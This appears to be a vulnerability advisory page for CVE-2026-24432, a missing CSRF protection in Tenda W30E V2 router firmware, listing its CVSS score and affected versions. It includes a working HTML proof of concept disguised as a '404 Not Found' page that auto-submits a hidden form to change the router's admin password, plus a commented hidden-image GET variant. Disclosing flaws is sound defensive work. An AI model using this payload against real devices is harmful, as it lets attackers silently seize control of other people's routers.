Security Vulnerability Report
CVE-2026-24432 CVSS 4.3 MEDIUM

CVE-2026-24432

Published: 2026-01-26 18:16:41
Last Modified: 2026-01-28 20:11:25

Description

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) lack cross-site request forgery (CSRF) protections on administrative endpoints, including those used to change administrator account credentials. As a result, an attacker can craft malicious requests that, when triggered by an authenticated user’s browser, modify administrative passwords and other configuration settings.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:w30e:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda W30E V2 V16.01.0.19(5037) and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CSRF PoC for Tenda W30E V2 - Change Admin Password -->
<!DOCTYPE html>
<html>
<head>
  <title>404 Not Found</title>
</head>
<body>
  <h1>Page Not Found</h1>
  <p>If you are not redirected in 3 seconds, <a href="http://192.168.0.1">click here</a>.</p>
  <form name="csrf" action="http://192.168.0.1/cgi-bin/cstecgi.cgi" method="POST" id="exploit">
    <input type="hidden" name="topicurl" value="/admin/set_account">
    <input type="hidden" name="username" value="admin">
    <input type="hidden" name="password" value="Attacker123!@#">
    <input type="hidden" name="passwordMask" value="Attacker123!@#">
  </form>
  <script>
    // Auto-submit form when page loads
    document.getElementById('exploit').submit();
  </script>
</body>
</html>
<!-- Alternative PoC using img tag for GET-based attacks -->
<!-- <img src="http://192.168.0.1/cgi-bin/cstecgi.cgi?topicurl=/admin/set_account&username=admin&password=AttackerPwd" style="display:none"> -->
```

References

https://www.tendacn.com/product/W30E (Product)
https://www.vulncheck.com/advisories/tenda-w30e-v2-missing-csrf-protections-for-administrative-actions (Third Party Advisory)

Raw JSON Data
